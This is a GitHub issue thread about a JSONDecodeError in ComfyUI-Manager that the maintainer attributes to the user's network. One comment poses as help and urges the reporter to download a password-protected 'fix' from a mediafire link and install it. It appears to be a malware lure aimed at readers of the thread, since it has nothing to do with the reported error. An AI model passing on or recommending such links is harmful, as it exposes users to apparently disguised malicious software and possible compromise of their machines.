### ISSUE TITLE
json.decoder.JSONDecodeError

### ISSUE THREAD

**Issue by chensyo** [Comfy-Org/ComfyUI-Manager#1007]
Recently, this error is bound to occur when not using VPN proxy, but not when enabling VPN.
Exception in thread Thread-9 (<lambda>):
Traceback (most recent call last):
  File "D:\Program Files (x86)\ComfyUI\python\lib\threading.py", line 1016, in _bootstrap_inner
    self.run()
  File "<enhanced_experience vendors.sentry_sdk.integrations.threading>", line 99, in run
  File "<enhanced_experience vendors.sentry_sdk.integrations.threading>", line 94, in _run_old_run_func
  File "<enhanced_experience vendors.sentry_sdk.utils>", line 1649, in reraise
  File "<enhanced_experience vendors.sentry_sdk.integrations.threading>", line 92, in _run_old_run_func
  File "D:\Program Files (x86)\ComfyUI\python\lib\threading.py", line 953, in run
    self._target(*self._args, **self._kwargs)
  File "D:\Program Files (x86)\ComfyUI\custom_nodes\ComfyUI-Manager\glob\manager_server.py", line 1343, in <lambda>
    threading.Thread(target=lambda: asyncio.run(default_cache_update())).start()
  File "D:\Program Files (x86)\ComfyUI\python\lib\asyncio\runners.py", line 44, in run
    return loop.run_until_complete(main)
  File "D:\Program Files (x86)\ComfyUI\python\lib\asyncio\base_events.py", line 649, in run_until_complete
    return future.result()
  File "D:\Program Files (x86)\ComfyUI\custom_nodes\ComfyUI-Manager\glob\manager_server.py", line 1340, in default_cache_update
    await asyncio.gather(a, b, c, d, e)
  File "D:\Program Files (x86)\ComfyUI\custom_nodes\ComfyUI-Manager\glob\manager_server.py", line 1327, in get_cache
    json_obj = await core.get_data(uri, True)
  File "D:\Program Files (x86)\ComfyUI\custom_nodes\ComfyUI-Manager\glob\manager_core.py", line 619, in get_data
    json_obj = json.loads(json_text)
  File "D:\Program Files (x86)\ComfyUI\python\lib\json\__init__.py", line 346, in loads
    return _default_decoder.decode(s)
  File "D:\Program Files (x86)\ComfyUI\python\lib\json\decoder.py", line 337, in decode
    obj, end = self.raw_decode(s, idx=_w(s, 0).end())
  File "D:\Program Files (x86)\ComfyUI\python\lib\json\decoder.py", line 355, in raw_decode
    raise JSONDecodeError("Expecting value", s, err.value) from None
json.decoder.JSONDecodeError: Expecting value: line 1 column 1 (char 0)

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ltdrdata** [comment]
It is your network issue, and there is currently no solution. It could be resolved in the future when reverse proxy support is implemented

**Comment by chensyo** [comment]
I see,Thank you for your reply despite your busy time!
